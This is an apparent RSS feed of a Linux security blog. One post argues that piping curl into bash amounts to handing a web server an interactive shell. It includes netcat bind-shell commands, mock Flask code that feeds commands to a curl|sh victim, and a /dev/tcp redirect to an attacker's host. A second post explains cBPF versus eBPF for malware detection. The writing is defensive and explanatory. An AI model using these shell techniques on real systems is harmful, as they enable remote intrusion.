Jekyll2023-05-05T20:07:21+00:00https://ortiz.sh/feed.xmlfriday@ortiz.sh:~$The new original cyber dog. Linux, crypto(graphy), Machine Learning.
Friday OrtizInteractivity is the halting problem in a trench coat.2023-05-05T19:00:00+00:002023-05-05T19:00:00+00:00https://ortiz.sh/linux/2023/05/05/STOP-INTERACTING<p>Or: please, <em>please</em>, stop piping <code class="language-plaintext highlighter-rouge">curl</code> into <code class="language-plaintext highlighter-rouge">bash</code> in prod.</p>
<p><strong>TL;DR:</strong> A shell’s built-in understanding (and the conventional understanding)
of its own interactivity is different from what might be considered interactive
from a security perspective. From a defensive security point of view, piping
<code class="language-plaintext highlighter-rouge">curl</code> into <code class="language-plaintext highlighter-rouge">bash</code> is indistinguishable from an interactive shell. Because of
the halting problem (kinda).</p>
<p><strong>‘TL;DR’TL;DR:</strong> My head hurts and I want to go home.</p>
<h2 id="interactive-shells-mean-something-bad-happened-right">Interactive shells mean something bad happened, right?</h2>
<p>Interactive shells in production are generally a bad sign, right? In modern
infrastructure, if you’re using some infrastructure-as-code tool, you’re
probably never shelling into a Linux box unless <a href="https://about.gitlab.com/blog/2017/02/10/postmortem-of-database-outage-of-january-31/">something has gone horribly
wrong</a>.
And you probably want to avoid doing so if it’s at all possible, because of how
error prone it can be to fix production issues this way. <a href="https://devops.stackexchange.com/questions/653/what-is-the-definition-of-cattle-not-pets">Cattle, not
pets</a>,
right? And barring those something-has-gone-terribly-wrong circumstances, an
interactive shell is likely the sign of an attacker… right? So you probably
want to know when an interactive shell is opened on a production system, right?</p>
<p>…right?</p>
<h2 id="what-even-is-an-interactive-shell-nobody-has-ever-explained-it-to-me">What even is an interactive shell? Nobody has ever explained it to me.</h2>
<p>I want you to think about what an interactive shell is before you keep reading.
Write it down if you have to. You’re probably wrong. From a certain point of
view, anyway.</p>
<p>I asked some friends this question and got a mix of answers.</p>
<blockquote>
<p>Question for the class: if I tell you I have two <code class="language-plaintext highlighter-rouge">bash</code> pids, 123 and 456, and
then I tell you “123 is interactive, but 456 is not” what is the difference
between them?</p>
</blockquote>
<p>One answer was “123 was spawned from a TTY and 456 was not.” This might seem
like a good answer, but you can definitely spawn an interactive shell without
a TTY involved.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ docker run --rm ubuntu:22.04 \
bash -c 'echo -n '"'"'echo $- && ls -l /proc/$$/fd'"'"' | bash -i'
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@7aa6f2237867:/# echo $- && ls -l /proc/$$/fd
hiBHs
total 0
lr-x------ 1 root root 64 May 5 15:35 0 -> pipe:[52434]
l-wx------ 1 root root 64 May 5 15:35 1 -> pipe:[50764]
l-wx------ 1 root root 64 May 5 15:35 2 -> pipe:[50765]
l-wx------ 1 root root 64 May 5 15:35 255 -> pipe:[50765]
root@7aa6f2237867:/# exit
</code></pre></div></div>
<p>First we query <code class="language-plaintext highlighter-rouge">bash</code> for the flags it was started with (<code class="language-plaintext highlighter-rouge">$-</code>). We can see the
<code class="language-plaintext highlighter-rouge">i</code> flag is present, and we can see the <code class="language-plaintext highlighter-rouge">$PS1</code> prompt. This <code class="language-plaintext highlighter-rouge">bash</code> process
believes itself to be interactive. It was not spawned from a TTY, and it is not
interacting with a TTY from its own perspective, which we can see when we check
its open file descriptors.</p>
<p>Another answer I got was along the lines of “123 is waiting for user input, and
456 is just executing a script.” That’s a better answer, but it’s still not
quite correct. Here’s a script that will definitely interact with the user, but
believes itself to be operating non-interactively.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ echo -n '#!/usr/bin/env bash\necho $-\nread -n 1 -p "Press a key!" _\n' > tmp.sh
$ chmod +x tmp.sh
$ bash -c ./tmp.sh
hB
Press a key!
$
</code></pre></div></div>
<p>As you can see, no <code class="language-plaintext highlighter-rouge">i</code> flag is set in the bash process running the script, but
it waits for us to press a key before continuing. You might be thinking, “sure,
the <em>script</em> is interactive, but the <em>shell</em> isn’t.” To which I say,
“semantics.” Pretend I’m an adversary. I am interacting with this shell. It is
interactive. Here’s a stronger (skid-ier?) example.</p>
<h4 id="terminal-1">Terminal 1</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc.traditional -lvp 4444 -e /bin/bash 2>/dev/null
</code></pre></div></div>
<h4 id="terminal-2">Terminal 2</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ nc localhost 4444
ls -l /proc/$$/fd
total 0
lrwx------ 1 senicar senicar 64 May 5 15:50 0 -> socket:[55727]
lrwx------ 1 senicar senicar 64 May 5 15:50 1 -> socket:[55727]
l-wx------ 1 senicar senicar 64 May 5 15:50 2 -> /dev/null
echo $-
hBs
</code></pre></div></div>
<p>No <code class="language-plaintext highlighter-rouge">i</code> flag. No TTY. No <code class="language-plaintext highlighter-rouge">$PS1</code>. Fully interactive. If you’ve done any kind of
Linux offensive work, or, like, any CTF, you probably already know this.</p>
<h2 id="whats-all-this-about-an-i-flag-then">What’s all this about an <code class="language-plaintext highlighter-rouge">i</code> flag, then?</h2>
<p>Let’s <del>shamelessly steal</del> liberally draw inspiration from <a href="https://unix.stackexchange.com/questions/277130/bash-c-and-noninteractive-shell/277153#277153">this stackexchange
post</a>.
The <code class="language-plaintext highlighter-rouge">i</code> flag is set in <code class="language-plaintext highlighter-rouge">bash</code> when <code class="language-plaintext highlighter-rouge">bash</code> considers itself to be interactive.
What defines <code class="language-plaintext highlighter-rouge">bash</code> as being non-interactive? Whatever <code class="language-plaintext highlighter-rouge">bash</code> does when you call
it with <code class="language-plaintext highlighter-rouge">-c</code>. <a href="https://github.com/bminor/bash/blob/ec8113b9861375e4e17b3307372569d429dec814/shell.c#L1860">This function, that’s
it</a>.
Non-interactive means no command history, no job management, no line editing, no
prompt, and errors can’t be ignored. We’ve clearly demonstrated interactivity
without these features, so the internal <code class="language-plaintext highlighter-rouge">bash</code> understanding of interactive
clearly doesn’t match the security-oriented understanding.</p>
<p>There must be other definitions. Let’s check those!</p>
<p>Here’s what <a href="https://web.archive.org/web/20221210223404/https://www.gnu.org/software/libc/manual/html_node/Concepts-of-Job-Control.html">the <code class="language-plaintext highlighter-rouge">glibc</code>
manual</a>
says:</p>
<blockquote>
<p>The fundamental purpose of an interactive shell is to read commands from the
user’s terminal and create processes to execute the programs specified by those
commands.</p>
</blockquote>
<p>In other words, interactive means that the shell’s standard input is a TTY. We
know this isn’t necessary for interactivity. Next.</p>
<p>What about that warning <code class="language-plaintext highlighter-rouge">apt</code> gives you in a script? The one that says “Use with
caution in scripts.” How is <code class="language-plaintext highlighter-rouge">apt</code> detecting interactivity in practice? <a href="https://salsa.debian.org/apt-team/apt/-/blob/9e1398b164f55238990907f63dfdef60588d9b24/apt-private/private-main.cc#L79">Let’s
check the source</a>.</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="n">isatty</span><span class="p">(</span><span class="n">STDOUT_FILENO</span><span class="p">)</span> <span class="o">&&</span>
<span class="n">_config</span><span class="o">-></span><span class="n">FindB</span><span class="p">(</span><span class="s">"Apt::Cmd::Disable-Script-Warning"</span><span class="p">,</span> <span class="nb">false</span><span class="p">)</span> <span class="o">==</span> <span class="nb">false</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">cerr</span> <span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span>
<span class="o"><<</span> <span class="s">"WARNING: "</span> <span class="o"><<</span> <span class="n">flNotDir</span><span class="p">(</span><span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o"><<</span> <span class="s">" "</span>
<span class="o"><<</span> <span class="s">"does not have a stable CLI interface. "</span>
<span class="o"><<</span> <span class="s">"Use with caution in scripts."</span>
<span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span>
<span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Oh, it’s checking if standard output is a TTY. We’ve already shown that’s not
required for interactivity. Boo.</p>
<p>What about POSIX? Let’s look at how <a href="https://pubs.opengroup.org/onlinepubs/9699919799/utilities/sh.html">they specify
sh</a>. From
POSIX’s perspective, <code class="language-plaintext highlighter-rouge">sh</code> is interactive if it’s started with <code class="language-plaintext highlighter-rouge">-i</code>, <em>or</em> if it
has no arguments but standard input <strong>and</strong> standard output are a TTY. This is
more constrained than apt, similar to what we see in glibc, and still not useful
from a security perspective.</p>
<h2 id="please-just-tell-me-what-interactive-means-to-you">Please just tell me what “interactive” means to you.</h2>
<p>My favorite answer to the “what distinguishes pid 123 from pid 456” question
came from Patton Oswalt in Ratatouille.</p>
<blockquote>
<p>Process 123 has a loop that alters its program flow to reach new branches
pending input via file descriptors (e.g., stdin or the network) or process
signals. Process 456 has a loop with a defined set of program flow branches that
will be reached as defined by a preset configuration at the start of the
process.</p>
</blockquote>
<p>I think that’s perfect. An interactive shell (or interactive process in general)
is one that sits and waits for <em>something</em> to happen to it, and that <em>something</em>
determines control flow. A non-interactive program has all of its instructions
known at the time it starts. It doesn’t sit around and wait for more, it just
chugs along doing its thing. For example, <code class="language-plaintext highlighter-rouge">bash -c 'echo "Hello, world!"'</code> is
non-interactive, because we know all the instructions before it starts. It won’t
change, it won’t wait to receive more from <code class="language-plaintext highlighter-rouge">stdin</code>, or a pipe, or a socket. It
echoes out “Hello, world!”, then exits. In contrast, <code class="language-plaintext highlighter-rouge">nc -lvp 4444 | /bin/bash</code>
is interactive, even if we spawn it (like we did above) without the <code class="language-plaintext highlighter-rouge">i</code> flag or
without a TTY being involved. Its control flow is being determined at runtime,
based on whatever information is coming into it from a pipe, which is itself
receiving information from the network. For it to be a shell and not just a
process it should have some loop that performs arbitrary command interpretation,
distinguishing an interactive shell from, say, a web server. Beautiful.</p>
<p>Wait a minute.</p>
<blockquote>
<p>a defined set of program flow branches that will be reached as defined by a
preset configuration at the start of the process</p>
</blockquote>
<p>Ah crap, that’s <a href="https://en.wikipedia.org/wiki/Halting_problem">the halting
problem</a>. Determining that a
shell is non-interactive means determining that it will halt.</p>
<h2 id="what-does-this-have-to-do-with-curl-and-pipes">What does this have to do with <code class="language-plaintext highlighter-rouge">curl</code> and pipes?</h2>
<p>Let’s just… ignore that. For a moment. In practice it’s not that big of a
deal. Most scripts are simple enough that we can actually determine that they’ll
halt. If you slap a <code class="language-plaintext highlighter-rouge">-s -- -y</code> to the end of the <a href="https://rustup.rs/">rust installer
command</a>, you can manually trace it doing its thing, then
stopping. If you don’t start it with <code class="language-plaintext highlighter-rouge">-y</code>, you can see it starts waiting for
user input (forever, if you ignore it). So if we can easily determine that this
<code class="language-plaintext highlighter-rouge">curl | sh</code> will halt, and is non-interactive, why did I claim that it was
interactive at the start of this post?</p>
<blockquote>
<p>at the start of the process</p>
</blockquote>
<p>When <code class="language-plaintext highlighter-rouge">sh</code> starts here, we don’t have the whole script. When you trace the script
manually to watch it end, you’re doing so after it’s already been downloaded.
When you pipe something into a shell directly from the network you are not
running a script. You are giving an interactive shell to some web server and
asking it to please do its thing thank you.</p>
<p>Most of the time this is actually fine. There’s no meaningful difference between
downloading an installer off rustup.rs and giving them a shell. I’m trusting
them to run code on my box either way. But if you’re, say, running a container
in production there is a meaningful security difference between running an
installer with a finite set of instructions and giving a third party service a
shell.</p>
<p>Yes, you can still trust rustup.rs either way. But for your security team, from
a behavioral perspective, running the installer by piping it into <code class="language-plaintext highlighter-rouge">sh</code> instead
of running it off disk looks <em>exactly the same</em> as an adversary popping a shell
on your box with <code class="language-plaintext highlighter-rouge">nc</code>. Your adversaries know this, and they’re laughing at you
whenever you do it.</p>
<p>Back in 2016 someone wrote a blog post about <a href="https://web.archive.org/web/20230101004612/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/">detecting the use of <code class="language-plaintext highlighter-rouge">curl | bash</code>
server
side</a>
and selectively feeding an end user malicious code. The server is making a
determination about what’s downloading from it, and feeding different content
based on that determination. The interpreter on the victim side does different
things based on that determination, because it’s not really non-interactive.
It’s sitting in a loop, waiting for the next command to come in. It’s being
interacted with.</p>
<p>We can take this concept and turn it into something human interactive. That is,
we can take <code class="language-plaintext highlighter-rouge">curl | sh</code>, and give ourselves a shell. Here’s some mock python
code for a flask app does just that. The remainder of the code is left as an
exercise to the reader.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">shell_route</span><span class="p">():</span>
<span class="k">def</span> <span class="nf">generate</span><span class="p">():</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="nb">input</span><span class="p">(</span><span class="s">"$ "</span><span class="p">)</span>
<span class="k">yield</span> <span class="sa">f</span><span class="s">'</span><span class="si">{</span><span class="n">cmd</span><span class="si">}</span><span class="se">\n</span><span class="s">echo </span><span class="si">{</span><span class="p">(</span><span class="nb">chr</span><span class="p">(</span><span class="mi">33</span><span class="p">)</span> <span class="o">+</span> <span class="s">"1"</span><span class="p">)</span> <span class="o">*</span> <span class="mi">4096</span><span class="si">}</span><span class="s"> >/dev/null</span><span class="se">\n</span><span class="s">'</span>
<span class="k">return</span> <span class="n">app</span><span class="p">.</span><span class="n">response_class</span><span class="p">(</span><span class="n">stream_with_context</span><span class="p">(</span><span class="n">generate</span><span class="p">()),</span> <span class="n">mimetype</span><span class="o">=</span><span class="s">'text/plain'</span><span class="p">)</span>
</code></pre></div></div>
<p>This will let us send commands. If we want to get replies, we can do something
like set up a listener with netcat send <code class="language-plaintext highlighter-rouge">exec >/dev/tcp/our_ip/our_port</code> as the
first command. This will redirect output back to us. Bam, shell.</p>
<p>Why would you ever do this? I have no idea. There’s really no point. If someone
is downloading and running your code, there’s no reason to go through the effort
of making it interactive. It’s quite silly. But it does work! In an extremely
reductive and pedantic sense, <code class="language-plaintext highlighter-rouge">curl | sh</code> is an interactive shell. And that
tickles my brain. It also makes your security team’s job harder, so please stop
doing it.</p>Friday OrtizOr: please, please, stop piping curl into bash in prod.Stop saying eBPF when you mean cBPF.2023-03-13T20:00:00+00:002023-03-13T20:00:00+00:00https://ortiz.sh/linux/2023/03/13/CBPF-VS-EBPF<p><strong>TL;DR:</strong> Let’s detect malware that uses BPF the right way. eBPF has become a hot
topic, which leads to some hype whenever BPF is found in malware. The thing is,
BPF malware is nothing new and most malware is using cBPF, not eBPF. Conflating
cBPF with eBPF is harmful to defenders, who really need to understand the
difference between the two when writing detections.</p>
<p>I’m going to assume you’re at least familiar with eBPF at the marketing blog
level. If not, check out
<a href="https://ortiz.sh/ebpf/2022/01/04/eBPF-FOR-BEGINNINERS.html">some</a>
<a href="https://deepfence.io/aya-your-trusty-ebpf-companion/">of</a>
<a href="https://ortiz.sh/ebpf/2021/11/01/INTRODUCING-OXIDEBPF.html">these</a>
<a href="https://www.youtube.com/watch?v=Y-ROv4LsO0Q">links</a>. Or, if those aren’t
technical enough, <a href="https://tmpout.sh/2/4.html">try</a>
<a href="https://ortiz.sh/bpf/2021/12/02/THE-HIVE.html">these</a>.</p>
<p>Also, code examples will come from kernel 6.2.9. This
means the examples can (do, and probably will) change significantly without
warning on newer and older kernels.</p>
<h1 id="whats-the-problem">What’s the problem?</h1>
<p>As you’ve almost definitely noticed (you did click to read this after all),
interest in eBPF has skyrocketed in the past two or so years. The hype cycle can
make it hard to discern facts from marketing, a critical distinction when trying
to defend against BPF based malware. You’ve probably heard that eBPF is the
successor to something called cBPF, but unless you’ve dug deeper than the blog
post level that’s probably all you know. As we’ll discuss, eBPF and cBPF are
quite different in their operation, capabilities, and defenses.</p>
<p>Let’s pick a few recent examples. BlackBerry’s writeup of Symbiote intentionally
confuses cBPF with eBPF, explicitly calling what Symbiote attaches with
<code class="language-plaintext highlighter-rouge">setsockopt</code> “eBPF code.<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>” You can’t actually attach eBPF code with
<code class="language-plaintext highlighter-rouge">setsockopt</code>. Elastic, in their write up of BPFDoor, does not claim that the
malware uses eBPF, but also does not differentiate the two and does not mention
how the BPF component to the malware is actually loaded. They do link to the
correct cBPF documentation, so it’s a bit better <sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">2</a></sup>. Sysdig’s writeup of
BPFDoor is probably the best, they clearly tell us that eBPF is not involved
right in the title and let defenders know about how <code class="language-plaintext highlighter-rouge">setsockopt</code> is involved
<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>
<p>If you look across the internet you’ll find a plethora of users and commentators
mixing up the two technologies <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>. Even the official kernel documentation calls
eBPF a “[significant extension]” of cBPF <sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">5</a></sup>, which we’ll see is a bit of a
fudge.</p>
<h1 id="what-do-kprobes-have-to-do-with-packet-filters">What do kprobes have to do with packet filters?</h1>
<p>The first clue that this technology has grown far beyond its original scope is
that you can use what is, ostensibly, a <em>Packet Filter</em> to instrument kernel
functions. How did we get here?</p>
<p>The original BPF paper <sup id="fnref:8" role="doc-noteref"><a href="#fn:8" class="footnote" rel="footnote">6</a></sup> describes a system for inspecting and filtering
packets from userspace where the filtering is performed in-kernel, reducing the
amount of time that needs to be spent copying every packet into userspace and
netting significant performance gains. As an aside, the paper also calls the
system “BSD Packet Filter,” not “Berkeley Packet Filter.” It goes on to
describe an in-kernel “filter machine” which is explicitly not a fully featured
virtual machine that can perform arbitrary filtering. It is specifically focused
on filtering network packets. This technology was adopted in several places in
the kernel, as well as some network device drivers, to filter packets. Then, at
the start of 2012, the onward march of “using packet filters to filter things
that are decidedly not packets” began with SECCOMP filters<sup id="fnref:14" role="doc-noteref"><a href="#fn:14" class="footnote" rel="footnote">7</a></sup>.</p>
<p>Soon after, in 2014, the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall was introduced alongside eBPF <sup id="fnref:9" role="doc-noteref"><a href="#fn:9" class="footnote" rel="footnote">8</a></sup>.
This allowed users to use BPF not just to filter packets, but to filter just
about anything that passes through the kernel (and some stuff that doesn’t!).
The official kernel documentation gives a high level overview of some of the new
features <sup id="fnref:6" role="doc-noteref"><a href="#fn:6" class="footnote" rel="footnote">9</a></sup>: eBPF increased the amount of registers available from 2 to 10,
increased the register size to 64 bits, and made calling into helper functions
more efficient. Critically, eBPF also changed the encoding of instructions to
support these new features. This means that eBPF bytecode and cBPF bytecode are
<em>not</em> mutually compatible. Is it “significantly extended?” Sure, I suppose, but
there are a lot of fundamental changes that mean cBPF code won’t “just work”
with the eBPF specification.</p>
<p><a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/filter.h#L24">Here is a cBPF
instruction</a>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock_filter</span> <span class="p">{</span> <span class="cm">/* Filter block */</span>
<span class="n">__u16</span> <span class="n">code</span><span class="p">;</span> <span class="cm">/* Actual filter code */</span>
<span class="n">__u8</span> <span class="n">jt</span><span class="p">;</span> <span class="cm">/* Jump true */</span>
<span class="n">__u8</span> <span class="n">jf</span><span class="p">;</span> <span class="cm">/* Jump false */</span>
<span class="n">__u32</span> <span class="n">k</span><span class="p">;</span> <span class="cm">/* Generic multiuse field */</span>
<span class="p">};</span>
</code></pre></div></div>
<p><a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf.h#L71">And here is an eBPF
instruction</a>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">bpf_insn</span> <span class="p">{</span>
<span class="n">__u8</span> <span class="n">code</span><span class="p">;</span> <span class="cm">/* opcode */</span>
<span class="n">__u8</span> <span class="n">dst_reg</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span> <span class="cm">/* dest register */</span>
<span class="n">__u8</span> <span class="n">src_reg</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span> <span class="cm">/* source register */</span>
<span class="n">__s16</span> <span class="n">off</span><span class="p">;</span> <span class="cm">/* signed offset */</span>
<span class="n">__s32</span> <span class="n">imm</span><span class="p">;</span> <span class="cm">/* signed immediate constant */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>Interestingly, the instructions <em>are</em> the same size. This was done
intentionally, along with other overlapping features, to make translating or
porting cBPF code into eBPF code easier<sup id="fnref:15" role="doc-noteref"><a href="#fn:15" class="footnote" rel="footnote">10</a></sup>. This means that, in theory, you
could shove cBPF bytecode into the <code class="language-plaintext highlighter-rouge">bpf()</code> syscall.</p>
<p>To prove a point, let’s see what happens when we do exactly that. We’ll use
<code class="language-plaintext highlighter-rouge">tcpdump</code>’s ability to output cBPF bytecode to create a dead simple cBPF filter.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># tcpdump -i lo -dd
{ 0x6, 0, 0, 0x00040000 },
</code></pre></div></div>
<p>This gives us a code of <code class="language-plaintext highlighter-rouge">0x06</code>, empty <code class="language-plaintext highlighter-rouge">jt</code> and <code class="language-plaintext highlighter-rouge">jf</code>, and a multiuse value of
<code class="language-plaintext highlighter-rouge">0x00040000</code>. The code of <code class="language-plaintext highlighter-rouge">0x06</code> corresponds to
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf_common.h#L13"><code class="language-plaintext highlighter-rouge">BPF_RET</code></a>,
which indicates that this is a return instruction. The <code class="language-plaintext highlighter-rouge">0x00040000</code> value
corresponds to the size of the packet (snapshot length) we want to capture. By
default, it’s 256 kibibytes. This simple filter immediately returns and says
“grab the whole packet.”</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <linux/bpf.h>
#include <linux/filter.h>
#include <sys/syscall.h>
#include <stdio.h>
#include <unistd.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="k">struct</span> <span class="n">sock_filter</span> <span class="n">filter</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">{</span> <span class="mh">0x6</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mh">0x00040000</span> <span class="p">},</span>
<span class="p">};</span>
<span class="kt">char</span> <span class="o">*</span> <span class="n">license</span> <span class="o">=</span> <span class="s">"GPL"</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">bpf_insn</span><span class="o">*</span> <span class="n">insn</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">bpf_insn</span><span class="o">*</span><span class="p">)</span> <span class="o">&</span><span class="n">filter</span><span class="p">;</span>
<span class="k">union</span> <span class="n">bpf_attr</span> <span class="n">attr</span> <span class="o">=</span> <span class="p">{</span>
<span class="p">.</span><span class="n">prog_type</span> <span class="o">=</span> <span class="n">BPF_PROG_TYPE_SOCKET_FILTER</span><span class="p">,</span>
<span class="p">.</span><span class="n">insn_cnt</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span>
<span class="p">.</span><span class="n">insns</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">)</span> <span class="n">insn</span><span class="p">,</span>
<span class="p">.</span><span class="n">license</span> <span class="o">=</span> <span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="kt">long</span><span class="p">)</span> <span class="n">license</span><span class="p">,</span>
<span class="c1">// omitted for space</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="n">syscall</span><span class="p">(</span><span class="n">SYS_bpf</span><span class="p">,</span> <span class="n">BPF_PROG_LOAD</span><span class="p">,</span> <span class="o">&</span><span class="n">attr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">attr</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">perror</span><span class="p">(</span><span class="s">"bpf"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we run it we immediately get an <code class="language-plaintext highlighter-rouge">EINVAL</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># cc bpf.c
# ./a.out
bpf: Invalid argument
</code></pre></div></div>
<p>But why does this fail? When the cBPF instruction gets interpreted as an eBPF
instruction, the <code class="language-plaintext highlighter-rouge">0x06</code> half of the cBPF <code class="language-plaintext highlighter-rouge">code</code> short ends up in the eBPF <code class="language-plaintext highlighter-rouge">code</code>
byte. In eBPF this value maps to
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/uapi/linux/bpf.h#L17"><code class="language-plaintext highlighter-rouge">BPF_JMP32</code></a>.
In eBPF this is called an <em>instruction class</em> and should be paired with an
<em>operation</em> to do something useful. For example, the eBPF equivalent of
<code class="language-plaintext highlighter-rouge">BPF_RET</code> is
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/include/linux/filter.h#L387"><code class="language-plaintext highlighter-rouge">BPF_EXIT_INSN</code></a>
which is the OR of <code class="language-plaintext highlighter-rouge">BPF_JMP</code> (class) and <code class="language-plaintext highlighter-rouge">BPF_EXIT</code> (operation). When we pass
this filter straight into the <code class="language-plaintext highlighter-rouge">bpf</code> syscall we end up in the
<a href="https://elixir.bootlin.com/linux/v6.2.9/source/kernel/bpf/verifier.c#L2402"><code class="language-plaintext highlighter-rouge">check_subprogs</code></a>
function, which checks our code and falls through to the subprogram length
check. Because we fell through, the verify knows we must have some kind of jump
instruction. Because our program is only one instruction long, the jump is
necessarily out of range, and the verification fails.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">off</span> <span class="o">=</span> <span class="n">i</span> <span class="o">+</span> <span class="n">insn</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">off</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="c1">// off = 1 for the cBPF program, subprog_end = 1</span>
<span class="k">if</span> <span class="p">(</span><span class="n">off</span> <span class="o"><</span> <span class="n">subprog_start</span> <span class="o">||</span> <span class="n">off</span> <span class="o">>=</span> <span class="n">subprog_end</span><span class="p">)</span> <span class="p">{</span>
<span class="n">verbose</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="s">"jump out of range from insn %d to %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">off</span><span class="p">);</span>
<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Of course you might be able to hand craft a valid cBPF-eBPF polyglot, but the
point remains that the two are neither designed nor intended to be mutually
compatible. The correct way to load a cBPF filter into eBPF is to simply load
the filter as usual, with <code class="language-plaintext highlighter-rouge">SO_ATTACH_FILTER</code> set while calling <code class="language-plaintext highlighter-rouge">setsockopt</code>. In
a modern kernel this will get verified by <code class="language-plaintext highlighter-rouge">bpf_check_classic</code> and, assuming it
passes, translated into eBPF bytecode by <code class="language-plaintext highlighter-rouge">bpf_convert_filter</code> before being
attached and ran.</p>
<p>When thinking about the difference between cBPF and eBPF, it’s better to think
of it as more of a Python 2 to Python 3 style conversion and not as a C to C++
style conversion<sup id="fnref:pedantic" role="doc-noteref"><a href="#fn:pedantic" class="footnote" rel="footnote">11</a></sup>. eBPF is its own new thing, not a superset of cBPF.</p>
<h1 id="bpf-as-malware">BPF as Malware</h1>
<p>Let’s get back to malware. How is BPF actually being used in malware today? As
it turns out, it’s mostly cBPF filters. It makes a lot of sense that malware
authors would avoid eBPF. The capabilities are evolving rapidly, changes to the
verifier and differences in patch sets mean you can’t be sure your filters will
always work, and the lack of widespread BTF adoption until recently makes
running filters across different kernels tricky. If you want to target the
broadest base of Linux systems, you have to stick to cBPF.</p>
<p>Let’s take a look at a list of malware that leverages BPF, borrowed from
a Hushcon talk <sup id="fnref:7" role="doc-noteref"><a href="#fn:7" class="footnote" rel="footnote">12</a></sup>.</p>
<ul>
<li>cd00r (or cDoor): uses libpcap to build a cBPF filter</li>
<li>Turla’s Penquin: similar to cd00r, uses a cBPF filter for persistence</li>
<li>CIA’s HIVE: uses a cBPF socket filter similar to cd00r</li>
<li>NSA’s dewdrop: again, uses a flexible cBPF socket filter</li>
</ul>
<p>What’s the common theme here? Some kind of backdoor persistence, activated with
a cBPF filter. What about something more modern?</p>
<p>Let’s look at Symbiote first, from one of the samples that actually leverages
BPF.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="mo">0000</span><span class="n">d62c</span> <span class="n">memcpy</span><span class="p">(</span><span class="n">rax_10</span><span class="p">,</span> <span class="o">&</span><span class="n">filter</span><span class="p">,</span> <span class="mh">0x1d0</span><span class="p">)</span>
